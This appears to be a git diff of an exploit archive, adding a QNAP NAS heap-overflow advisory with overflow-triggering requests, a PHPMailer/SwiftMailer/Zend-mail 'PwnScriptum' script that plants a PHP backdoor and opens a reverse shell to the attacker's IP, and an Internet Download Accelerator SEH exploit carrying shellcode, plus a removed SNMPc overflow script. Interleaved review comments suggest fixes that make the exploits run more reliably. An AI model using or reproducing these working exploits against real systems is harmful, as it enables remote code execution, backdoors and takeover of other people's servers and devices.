 32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork - 'path' Parameter Remote File Inclusion",2008-11-06,DeltahackingTEAM,php,webapps,0
 32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 - SQL Injection / Cross-Site Scripting",2008-11-07,G4N0K,php,webapps,0
 32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",java,webapps,0
-32575,platforms/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - 'admin/home.php' Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
+32575,platforms/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
 32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0
 32577,platforms/asp/webapps/32577.txt,"Dizi Portali - 'film.asp' SQL Injection",2008-11-10,"Kaan KAMIS",asp,webapps,0
 32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0
@@ -36932,3 +36933,4 @@ id,file,description,date,author,platform,type,port
 40978,platforms/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,hardware,webapps,0
 40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0
 40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
+40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
diff --git a/platforms/linux/dos/40985.txt b/platforms/linux/dos/40985.txt
new file mode 100755
index 000000000..9c971ead0
--- /dev/null
+++ b/platforms/linux/dos/40985.txt
@@ -0,0 +1,333 @@
+==================
+
+1) [Heap overflow]
+
+==================
+
+Path: /home/httpd/cgi-bin/cgi.cgi
+
+u = valid user [guest|admin]
+
+1.1)
+
+/* Remote */
+
+[Remote host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<263;i++));do echo -en "A";done` HTTP/1.0\nHost: QNAP\n\n" | ncat --ssl 192.168.5.7 443
+
+HTTP/1.1 200 OK
+
+Date: Sat, 31 Dec 2016 00:01:11 GMT
+
+*** glibc detected *** cgi.cgi: free(): invalid next size (normal): 0x0806cec8 ***
+
+======= Backtrace: =========
+
+======= Memory map: ========
+
+08048000-08069000 r-xp 00000000 00: 0e 7559 /home/httpd/cgi-bin/authLogin.cgi
+
+08069000-0806b000 rw-p 00020000 00: 0e 7559 /home/httpd/cgi-bin/authLogin.cgi
+
+0806b000-0808c000 rw-p 00000000 00: 00 0 [heap]
+
+[====SNIP====]
+
+ffe53000-ffe54000 rw-p 00000000 00: 00 0
+
+Content-Length: 0
+
+Connection: close
+
+Content-Type: text/plain
+
+[Remote host]#
+
+=======
+
+1.2)
+
+/* Local test, to get more info from backtrace */
+
+# export QUERY_STRING="u=admin&p=`for((i=0;i<263;i++));do echo -en "A";done`"
+
+# ./cgi.cgi
+
+*** glibc detected *** ./cgi.cgi: free(): invalid next size (normal): 0x0806cec8 ***
+
+======= Backtrace: =========
+
+/lib/libc.so.6[0xf6c3da62]
+
+/lib/libc.so.6(cfree+0x89)[0xf6c3f729]
+
+/lib/libc.so.6(fclose+0x136)[0xf6c2e5c6]
+
+/lib/libnss_compat.so.2[0xf6b8ac25]
+
+/lib/libnss_compat.so.2(_nss_compat_getspnam_r+0xb2)[0xf6b8b282]
+
+/lib/libc.so.6(getspnam_r+0x77)[0xf6c9ef57]
+
+/lib/libc.so.6(getspnam+0x78)[0xf6c9e3f8]
+
+/usr/lib/libuLinux_NAS.so.0(Check_Local_User_Password+0x16c)[0xf7518972]
+
+/usr/lib/libuLinux_NAS.so.0(Check_System_User_Password+0x56)[0xf7518f66]
+
+/usr/lib/libuLinux_NAS.so.0(Check_NAS_Administrator_Password+0x24)[0xf75
+19098]
+
+./cgi.cgi[0x80502ed]
+
+./cgi.cgi[0x8051a7e]
+
+/lib/libc.so.6(__libc_start_main+0xe0)[0xf6bedf90]
+
+./cgi.cgi[0x804d151]
+
+======= Memory map: ========
+
+08048000-08069000 r-xp 00000000 00:0e 7559 /home/httpd/cgi-bin/authLogin.cgi
+
+08069000-0806b000 rw-p 00020000 00:0e 7559 /home/httpd/cgi-bin/authLogin.cgi
+
+0806b000-0808c000 rw-p 00000000 00:00 0 [heap]
+
+[====SNIP====]
+
+ffd9e000-ffdbe000 rwxp 00000000 00:00 0 [stack]
+
+ffdbe000-ffdbf000 rw-p 00000000 00:00 0
+
+Aborted
+
+#
+
+1.3)
+
+# export QUERY_STRING="u=admin&p=`for((i=0;i<5957;i++));do echo -en "A";done`"
+
+# ./cgi.cgi
+
+*** glibc detected *** : free(): invalid next size (normal): 0x0806e508 ***
+
+======= Backtrace: =========
+
+/lib/libc.so.6[0xf6c9da62]
+
+/lib/libc.so.6(cfree+0x89)[0xf6c9f729]
+
+/lib/libc.so.6(fclose+0x136)[0xf6c8e5c6]
+
+/lib/libnss_compat.so.2[0xf6beac25]
+
+/lib/libnss_compat.so.2(_nss_compat_getspnam_r+0xb2)[0xf6beb282]
+
+/lib/libc.so.6(getspnam_r+0x77)[0xf6cfef57]
+
+/lib/libc.so.6(getspnam+0x78)[0xf6cfe3f8]
+
+/usr/lib/libuLinux_NAS.so.0(Check_Local_User_Password+0x16c)[0xf7578972]
+
+/usr/lib/libuLinux_NAS.so.0(Check_System_User_Password+0x56)[0xf7578f66]
+
+/usr/lib/libuLinux_NAS.so.0(Check_NAS_Administrator_Password+0x24)[0xf75
+79098]
+
+[0x80502ed]
+
+[0x0]
+
+======= Memory map: ========
+
+08048000-08069000 r-xp 00000000 00:0e 6705 /home/httpd/cgi-bin/authLogin.cgi
+
+08069000-0806b000 rw-p 00020000 00:0e 6705 /home/httpd/cgi-bin/authLogin.cgi
+
+0806b000-0808c000 rw-p 00000000 00:00 0 [heap]
+
+[====SNIP====]
+
+# ./cgi.cgi
+
+Segmentation fault
+
+#
+
+# dmesg
+
+[====SNIP====]
+
+[ 2185.562493] cgi.cgi[17772]: segfault at ff9a4010 ip 00000000f6bd75c3 sp 00000000ff99f1bc error 4 in libc-2.6.1.so[f6b6b000+12d000]
+
+[====SNIP====]
+
+/* Local as shown below, but can of course be called from remote */
+
+==================
+
+2) [STACK junk]
+
+==================
+
+# export QUERY_STRING="bug"
+
+# ./jc.cgi
+
+Segmentation fault
+
+# dmesg
+
+[====SNIP====]
+
+[76277.192562] jc.cgi[18159]: segfault at 0 ip 00000000f6cbdffc sp 00000000ffeddbbc error 4 in libc-2.6.1.so[f6c52000+12d000]
+
+[====SNIP====]
+
+==================
+
+3) [STACK junk]
+
+==================
+
+/* Local as shown, but can be called from remote */
+
+# export QUERY_STRING="bug"
+
+# ./mediaGet.cgi
+
+Segmentation fault
+
+# dmesg
+
+[====SNIP====]
+
+[76802.837766] mediaGet.cgi[6589]: segfault at 0 ip 00000000f6bd8ffc sp 00000000ffc0498c error 4 in libc-2.6.1.so[f6b6d000+12d000]
+
+[====SNIP====]
+
+Have a nice day (and happy new year)
+
+/bashis
+
+========================
+
+Hello mcw (at) noemail (dot) eu [email concealed],
+
+We're writing to let you know that the group you tried to contact (security) may not exist, or you may not have permission to post messages to the group. A few more details on why you weren't able to post:
+
+* You might have spelled or formatted the group name incorrectly.
+
+* The owner of the group may have removed this group.
+
+* You may need to join the group before receiving permission to post.
+
+* This group may not be open to posting.
+
+If you have questions related to this or any other Google Group, visit the Help Center at https://support.google.com/a/qnap.com/bin/topic.py?topic=25838.
+
+Thanks,
+
+qnap.com admins
+
+----- Original message -----
+
+X-Received: by 10.99.242.5 with SMTP id v5mr94097752pgh.181.1483213806030;
+
+Sat, 31 Dec 2016 11:50:06 -0800 (PST)
+
+Return-Path:
+
+Received: from qnappm.info (mail2.qnappm.info. [113.196.50.102])
+
+by mx.google.com with ESMTP id c74si60891262pfk.272.2016.12.31.11.50.05
+
+for ;
+
+Sat, 31 Dec 2016 11:50:06 -0800 (PST)
+
+Received-SPF: fail (google.com: domain of mcw (at) noemail (dot) eu [email concealed] does not designate 113.196.50.102 as permitted sender) client-ip=113.196.50.102;
+
+Authentication-Results: mx.google.com;
+
+spf=fail (google.com: domain of mcw (at) noemail (dot) eu [email concealed] does not designate 113.196.50.102 as permitted sender) smtp.mailfrom=mcw (at) noemail (dot) eu [email concealed]
+
+X-AuthUser: qnap1688 (at) qnappm (dot) info [email concealed]
+
+Received: from aid.qnap.com ([113.196.50.99]:36962)
+
+by mail2.qnappm.info with [XMail 1.27 ESMTP Server]
+
+id for from ;
+
+Sun, 1 Jan 2017 04:13:48 +0800
+
+Date: Sun, 1 Jan 2017 03:50:06 +0800
+
+Return-Path: mcw (at) noemail (dot) eu [email concealed]
+
+To: security (at) qnap (dot) com [email concealed]
+
+From: bashis mcw
+
+Subject: Reporting Security Issues - [Critical] QNAP NAS devices suffer of Heap Overflow!
+
+Message-ID: <5acc9d206d9601dc574a02b114c83e8a (at) aid.qnap (dot) com [email concealed]>
+
+X-Priority: 3
+
+X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
+
+MIME-Version: 1.0
+
+Content-Type: multipart/alternative;
+
+boundary="b1_5acc9d206d9601dc574a02b114c83e8a"
+
+Category : Administration
+
+Subject : QNAP NAS devices suffer of Heap Overflow!
+
+Severity Level : Critical
+
+Description :
+
+Greetings gents,
+
+QNAP NAS devices suffer from a critical Heap Overflow in "cgi.cgi" and
+
+non critical stack crash in "jc.cgi and mediaGet.cgi".
+
+Successful exploitation of this heap overflow vulnerability can lead to
+
+unauthorised root (admin) privileges on QNAP devices with anonymous
+
+access. (no credential needed to exploit)
+
+Please note: 1st February 2017 i will release details of these bugs to
+
+Full Disclosure and Bugtraq e-mail lists.
+
+Please see below and attached.
+
+Have a nice day (and happy new year)
+
+/bashis
+
+==================
+
+1) [HEAP overflow]
+
+==================
+
+Path: /home/httpd/cgi-bin/cgi.cgi
+
+u = valid user [guest|admin]
+
+1.1)
+
+/* Remote */
+
+[Remote host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i
+
+Sign Time : 2017/01/01 03:50:06
\ No newline at end of file
diff --git a/platforms/multiple/remote/31715.pl b/platforms/multiple/remote/31715.pl
deleted file mode 100755
index 40b4907a3..000000000
--- a/platforms/multiple/remote/31715.pl
+++ /dev/null
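Review bot: The new advisory never states which QNAP firmware (QTS) versions were tested or are affected, nor whether a fixed release exists, so a reader cannot tell from this file whether a given device is exposed or which update closes the issue; the only version-like data present is the `libc-2.6.1.so` build in the dmesg lines. A short header at the top of the file giving the tested firmware version, the affected range if known, and the vendor status would make the entry usable for triage, and the bounce notice in the pasted e-mail (the `security` group "may not exist") suggests the report may never have reached the vendor, which is worth stating explicitly. The second half of the file is that bounce message plus a duplicate copy of sections 1 and 1.1 that is truncated at `for((i=0;i`; trimming it to the first, complete copy would avoid confusing readers about where the advisory ends. The memory maps list `/home/httpd/cgi-bin/authLogin.cgi` while the stated path is `cgi.cgi`; if the two are the same binary, a one-line note saying so would remove the apparent inconsistency.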
@@ -1,70 +0,0 @@ -source: http://www.securityfocus.com/bid/28990/info - -Castle Rock Computing SNMPc is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. - -Attackers can leverage this issue to execute arbitrary code in the context of the application, which typically runs with LocalSystem privileges. Successful exploits will compromise affected computers. Failed attacks will likely cause denial-of-service conditions. - -Versions prior to SNMPc 7.1.1 are vulnerable. - -#!usr/bin/perl -w - -################################################################################################################ -# Stack-based buffer overflow in the Network Manager in Castle Rock Computing SNMPc 7.1 and -# earlier allows remote attackers to cause a denial of service (crash) or execute arbitrary code -# via a long community string in an SNMP TRAP packet. -# -# Refer: -# http://web.nvd.nist.gov/view/vuln/detail?execution=e3s1 -# http://www.securityfocus.com/bid/28990/discuss -# -# -# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w" -# (say #!C:/Program Files/Perl/bin/perl -w) -# -# This was strictly written for educational purpose. Use it at your own risk. -# Author will not bare any responsibility for any damages watsoever. 
-# -# Author: Praveen Darshanam -# Email: praveen[underscore]recker[at]sify.com -# Date: 11th November, 2008 -# -# NOTE: Thanks to all my colleagues at iPolicy -# For reliable security solutions please visit http://www.ipolicynetworks.com/ -# -################################################################################################################## - -use Net::SNMP; - -printf("Enter the IP Adress of Vulnerable SNMP Manager "); -$host_vulnerable = ; -$port = 162; -$community = "D" x 19500; - -($session, $error) = Net::SNMP->session( - -hostname => $host_vulnerable, - -port => $port, - -community => $community, # v1/v2c - -maxmsgsize => 65535, - ); - if (!defined($session)) - { - printf("ERROR: %s.\n", $error); - exit 1; - } - -$ipaddress = "172.16.16.4"; -#Throwing an error without Agent so randomly assigned value to $ipaddress - -$result = $session->trap( - -agentaddr => $ipaddress, - ); - -if (!defined($result)) -{ - printf("ERROR: %s.\n", $session->error); - $session->close; - exit 1; -} - -$session->close; - diff --git a/platforms/php/webapps/40986.py b/platforms/php/webapps/40986.py new file mode 100755 index 000000000..9a5eb6a3d --- /dev/null +++ b/platforms/php/webapps/40986.py 
@@ -0,0 +1,208 @@ +#!/usr/bin/python + +intro = """\033[94m + __ __ __ __ __ + / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ + / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ + / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) +/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ + /____/ + + +PHPMailer / Zend-mail / SwiftMailer - Remote Code Execution Exploit + a.k.a "PwnScriptum" + + CVE-2016-10033 + CVE-2016-10045 + CVE-2016-10034 + CVE-2016-10074 + + +This PoC exploit aims to execute a reverse shell on the target in +the context of the web-server user via vulnerable PHP email library. + + +Discovered and Coded by: + +\033[1;34m + Dawid Golunski + https://legalhackers.com + + t: @dawid_golunski for updates +\033[0m +\033[94m +P.$. For testing only! Don't break the Web ;) +\033[0m +""" +info = """ +[Version] +Limited (ver. 1.0) + +[PoC Video] +See the the exploit in action at: + +https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html + +[Info] +This exploit targets a common webapp component - Contact Form. + +It combines payloads for the following vulns: + +1. PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) +https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html + +2. PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045 / escapeshell bypass) +https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln.html + +3. SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) +https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html + +4. 
Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034) +https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html + +[Usage] + +./PwnScriptum_RCE_exploit.py [-h] -url WEBAPP_BASE_URL -cf CONTACT_SCRIPT + [-d TARGET_UP_DIR] -ip ATTACKERS_IP + [-p ATTACKERS_PORT] [--version] + [--post-action POST_ACTION] + [--post-name POST_NAME] + [--post-email POST_EMAIL] + [--post-msg POST_MSG] + +Note, make sure the contact form matches the default field names (send/name/email/msg). +Otherwise override with --post-msg=message_box for example. + +""" + +import os +import argparse +import time +import urllib +import urllib2 +import socket +import sys + + +# The Main Meat +print intro + +# Show info +if '-H' in sys.argv: + print info + exit(0) +# Parse input args +parser = argparse.ArgumentParser(prog='PwnScriptum_RCE_exploit.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit (a.k.a \'PwnScriptum\')\nDiscovered by Dawid Golunski (https://legalhackers.com)') +parser.add_argument('-H', action='store_true', default="false", required=False, help='Full Help / Info Page') +parser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url') +parser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname') +parser.add_argument('-d' , dest='TARGET_UP_DIR', required=False, help='Target Upload Dir') +parser.add_argument('-ip', dest='ATTACKERS_IP', required=True, help='Attackers Public IP for RevShell') +parser.add_argument('-p', dest='ATTACKERS_PORT', required=False, help='Attackers Port for RevShell listener') +parser.add_argument('--version', action='version', version='%(prog)s 1.0 Limited edition') +parser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST "action" field name', default="send") +parser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST "name of sender" field name', 
default="name") +parser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST "email" field name', default="email") +parser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST "message" field name', default="msg") +args = parser.parse_args() + +# Preset vars +TMOUT = 3 +# Set Vars +if args.ATTACKERS_PORT is None: + args.ATTACKERS_PORT = 8080 +if args.TARGET_UP_DIR is None: + args.TARGET_UP_DIR = "upload" +# Build the target backdoor URL here (note the "random" pid bit to avoid php code collisions on multiple runs / multiple phpfile appends ;) +BACKDOOR_FILE = 'phpbackdoor' + str(os.getpid()) + '.php' +BACKDOOR_URL = args.WEBAPP_BASE_URL + '/' + args.TARGET_UP_DIR + '/' + BACKDOOR_FILE +CONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT + +# Show params +print """[+] Setting vars to: \n +WEBAPP_BASE_URL = [%s] +CONTACT_SCRIPT = [%s] +TARGET_UP_DIR = [%s] +ATTACKERS_IP = [%s] +ATTACKERS_PORT = [%s] +CONTACT_SCRIPT_URL = [%s] +BACKDOOR_FILEl = [%s] +""" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.TARGET_UP_DIR, args.ATTACKERS_IP, args.ATTACKERS_PORT, CONTACT_SCRIPT_URL, BACKDOOR_FILE) + + +print "[+] Choose your target / payload: " +print "\033[1;34m" +print """[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)\n""" +print """[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) + The escapeshellarg() bypass :)\n""" +print """[3] SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)\n""" +print """[4] Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n""" +print "\033[0m" + +try: + target = int(raw_input('[?] Select target [1-2]: ')) +except ValueError: + print "Not a valid choice. Exiting\n" + exit(2) +if (target>4): + print "No such target. 
Exiting\n" + exit(3) +if target == 1: + # PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) + payload = '"attacker\\" -oQ/tmp/ -X%s/%s some"@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE) +if target == 2: + # Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) + payload = "\"attacker\\' -oQ/tmp/ -X%s/%s some\"@email.com" % (args.TARGET_UP_DIR, BACKDOOR_FILE) +if target == 3: + # SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) + payload = '"attacker\\" -oQ/tmp/ -X%s/%s "@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE) +if target == 4: + # Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034) + payload = '"attacker\\" -oQ/tmp/ -X%s/%s "@email.com' % (args.TARGET_UP_DIR, BACKDOOR_FILE) + +print "\n[+] Generated mail() payload will upload the backdoor into the '%s' dir\n" % args.TARGET_UP_DIR +# PHP RCE code to be saved into the backdoor php file on the target in TARGET_UP_DIR. E.g: +# e.g: +#RCE_PHP_CODE = "" +RCE_PHP_CODE = """/dev/tcp/%s/%s 0<&1 2>&1' "); ?>""" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT) + +# The form names might need to be adjusted +post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: RCE_PHP_CODE} + +# Attack +# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor +print "[+] Backdoor upload via the contact form at '%s'\n" % CONTACT_SCRIPT_URL +data = urllib.urlencode(post_fields) +req = urllib2.Request(CONTACT_SCRIPT_URL, data) +response = urllib2.urlopen(req) +the_page = response.read() + + +# Check if the backdoor was uploaded correctly. +# A little trick here. The urlopen should timeout at sleep(X)-1 if the backdoor ran fine +# So we catch the timeout to find out. + +# Is it uploaded ? 
Try to execute the PHP backdoor and the Reverse Shell within it +print "[+] Checking for the backdoor at the URL '%s'\n" % BACKDOOR_URL +got_timeout = 0 +http_err = 0 +try: + urllib2.urlopen(BACKDOOR_URL, timeout = (TMOUT-1)) +except urllib2.HTTPError as e: + http_err = e.code +except socket.timeout as e: + print "[*] \033[1;32mLooking good!\033[0m The sleep() worked by the looks of it :) \nUrlopen timed out just in time for the shell :)\n" + got_timeout = 1 + +if (got_timeout != 1): + print "[!] Something went wrong... Got error: [%d] \nTry another dir? Push through, don't give up! :)\n" % http_err + exit(2) + +# Spawn the shell and wait for the sleep() PHP call to finish before /bin/bash is called +print "[+] We should get a shell if we got till here! Spawning netcat now! :)\n" +print "[+] \033[1;34mPlease tell me you're seeing this too... ;)\033[0m\n" +os.system("nc -v -l -p %d" % args.ATTACKERS_PORT) + +print "\n[+] Shell closed\n" + +print "\033[1;34mP.$. There's more to it :) Exiting, for now...\033[0m\n" + + + diff --git a/platforms/windows/remote/40984.py b/platforms/windows/remote/40984.py new file mode 100755 index 000000000..e974f075f --- /dev/null +++ b/platforms/windows/remote/40984.py 
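Review bot: The range check after `raw_input` only rejects `target > 4`, so an entry of 0 or a negative number passes every `if target == N` branch without binding `payload`, and the script then dies with a NameError at the `post_fields` line instead of the intended "No such target" exit; use `if not 1 <= target <= 4:`. The prompt string `'[?] Select target [1-2]: '` also disagrees with the four options printed just above it. `BACKDOOR_FILEl` in the settings printout is a typo for `BACKDOOR_FILE`. Separately, `parser.add_argument('-H', action='store_true', default="false", ...)` gives a boolean flag a truthy string default; it is harmless only because the flag is checked via `sys.argv` before `parse_args()` runs, which deserves a one-line comment.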
@@ -0,0 +1,161 @@ +#!/usr/bin/python +# +# Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit. +# Exploit Author: Fady Mohamed Osman (@fady_osman) +# Exploit-db : http://www.exploit-db.com/author/?a=2986 +# Youtube : https://www.youtube.com/user/cutehack3r +# Date: Jan 2, 2017 +# Vendor Homepage: http://westbyte.com/ +# Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator. +# Version: 6.10.1.1527 +# Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10. +# -------------- +# Internet download accelerator suffers from a BOF when an FTP Download of file with +# long name fails. +# -------------- +# To Exploit this issue: +# 1- Run HTTP server that will redirect to the FTP file with long name. +# 2- The ftp server will answer to the commands sent then will open a data connection. +# 3- The script will send an empty file list and close the connection to trigger the BOF condition. +# 5- Happy new year :D. + +import SocketServer +import threading + + +# IP to listen to, needed to construct PASV response so 0.0.0.0 is not gonna work. +ip = "192.168.1.100" +ipParts = ip.split(".") +PasvResp = "("+ ipParts[0]+ "," + ipParts[1]+ "," + ipParts[2] + "," + ipParts[3] + ",151,130)" +# Run Calc.exe +buf=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" +"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" +"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" +"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" +"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" +"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" +"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") + + + + + +class HTTPHandler(SocketServer.BaseRequestHandler): + """ + The request handler class for our HTTP server. + + This is just so we don't have to provide a suspicious FTP link with long name. 
+ """ + + def handle(self): + # self.request is the TCP socket connected to the client + self.data = self.request.recv(1024).strip() + print "[*] Recieved HTTP Request" + print "[*] Sending Redirction To FTP" + # just send back the same data, but upper-cased + # SEH Offset 336 - 1056 bytes for the payload - 0x10011b53 unzip32.dll ppr 0x0c + payload = "ftp://192.168.1.100/"+ 'A' * 336 + "\xeb\x06\x90\x90" + "\x53\x1b\x01\x10" + buf + "B" * (1056 - len(buf)) + self.request.sendall("HTTP/1.1 302 Found\r\n" + + "Host: Server\r\nConnection: close\r\nLocation: "+ + payload+ + "\r\nContent-type: text/html; charset=UTF-8\r\n\r\n") + print "[*] Redirection Sent..." + +class FTPHandler(SocketServer.BaseRequestHandler): + """ + The request handler class for our FTP server. + + This will work normally and open a data connection with IDA. + """ + + def handle(self): + # User Command + self.request.sendall("220 Nasty FTP Server Ready\r\n") + User = self.request.recv(1024).strip() + print "[*] Recieved User Command: " + User + self.request.sendall("331 User name okay, need password\r\n") + # PASS Command + Pass = self.request.recv(1024).strip() + print "[*] Recieved PASS Command: " + Pass + self.request.sendall("230-Password accepted.\r\n230 User logged in.\r\n") + # SYST Command + Syst = self.request.recv(1024).strip() + print "[*] Recieved SYST Command: " + Syst + self.request.sendall("215 UNIX Type: L8\r\n") + # TYPE Command + Type = self.request.recv(1024).strip() + print "[*] Recieved Type Command: " + Type + self.request.sendall("200 Type set to I\r\n") + # REST command + Rest = self.request.recv(1024).strip() + print "[*] Recieved Rest Command: " + Rest + self.request.sendall("200 OK\r\n") + # CWD command + Cwd = self.request.recv(2048).strip() + print "[*] Recieved CWD Command: " + Cwd + self.request.sendall("250 CWD Command successful\r\n") + + # PASV command. 
+ Pasv = self.request.recv(1024).strip() + print "[*] Recieved PASV Command: " + Pasv + self.request.sendall("227 Entering Passive Mode " + PasvResp + "\r\n") + + #LIST + List = self.request.recv(1024).strip() + print "[*] Recieved LIST Command: " + List + self.request.sendall("150 Here comes the directory listing.\r\n226 Directory send ok.\r\n") + + + + +class FTPDataHandler(SocketServer.BaseRequestHandler): + """ + The request handler class for our FTP Data connection. + + This will send useless response and close the connection to trigger the error. + """ + + def handle(self): + # self.request is the TCP socket connected to the client + print "[*] Recieved FTP-Data Request" + print "[*] Sending Empty List" + # just send back the same data, but upper-cased + self.request.sendall("total 0\r\n\r\n") + self.request.close() + + +if __name__ == "__main__": + HOST, PORT = ip, 8000 + SocketServer.TCPServer.allow_reuse_address = True + + print "[*] Starting the HTTP Server." + # Create the server, binding to localhost on port 8000 + HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler) + + # Running the http server (using a thread so we can continue and listen for FTP and FTP-Data). + HTTPThread = threading.Thread(target=HTTPServer.serve_forever) + HTTPThread.daemon = True + HTTPThread.start() + + print "[*] Starting the FTP Server." + # Running the FTP server. + FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler) + + # Running the FTP server thread. + FTPThread = threading.Thread(target=FTPServer.serve_forever) + FTPThread.daemon = True + FTPThread.start() + + print "[*] Opening the data connection." + # Opening the FTP data connection - DON'T CHANGE THE PORT. + FTPData = SocketServer.TCPServer((HOST, 38786), FTPHandler) + + # Running the FTP Data connection Thread. + DataThread = threading.Thread(target=FTPData.serve_forever) + DataThread.daemon = True + DataThread.start() + + print "[*] Listening for FTP Data." + # Making the main thread wait. 
+ print "[*] To exit the script please press any key at any time." + raw_input()
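Review bot: `payload` in `HTTPHandler.handle` hard-codes `"ftp://192.168.1.100/"` while the listener address and the PASV response are derived from the module-level `ip`, so changing `ip` leaves the redirect pointing at the old address; build it as `"ftp://" + ip + "/"` instead. The comment `# just send back the same data, but upper-cased` in both `HTTPHandler.handle` and `FTPDataHandler.handle` is left over from the SocketServer documentation example and describes nothing the code does; replace it with what each handler actually sends. `FTPDataHandler` is also never bound: the server created for port 38786 under the "Opening the FTP data connection" comment is constructed with `FTPHandler`, so as written the class is dead code and the comment above it does not match the code.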